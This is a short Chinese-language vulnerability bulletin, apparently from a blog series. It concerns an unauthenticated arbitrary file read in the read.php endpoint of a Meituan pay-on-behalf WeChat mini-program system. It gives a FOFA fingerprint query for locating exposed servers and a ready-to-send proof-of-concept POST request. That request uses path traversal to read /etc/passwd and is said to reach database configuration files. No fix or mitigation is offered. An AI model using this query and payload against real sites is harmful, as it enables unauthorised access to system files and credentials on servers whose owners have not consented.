大家好,今天是Dest1ny漏洞库的专题!!
会时不时发送新的漏洞资讯!!
大家多多关注,多多点赞!!!
0x01 产品简介
美团代付小程序>微信小程序系统是美团点评旗下的一款基于小程序>微信小程序技术开发的应用程序功能之一,它允许用户方便快捷地请求他人为自己支付订单费用。随着移动支付的普及和小程序>微信小程序的广泛应用,美团作为中国领先的本地生活服务平台,推出了代付功能,以满足用户多样化的支付需求。通过小程序>微信小程序,用户可以轻松实现代付操作,无需跳转到其他应用或网页,提高了支付的便捷性和效率。前台支持购物车,个人中心,多选项等功能 ,后台支持推广,代理管理,菜品管理,积分明细,订单管理,模板,支付通道管理等功能。
0x02 漏洞概述
美团代付小程序>微信小程序系统 read.php 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 复现环境
FOFA:body="/h5/static/js/chunk-vendors.js"
0x04 漏洞复现
PoC
POST /static/ueditor22/_test/tools/br/read.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closename=../../../../../../../../../etc/passwd
读取数据库文件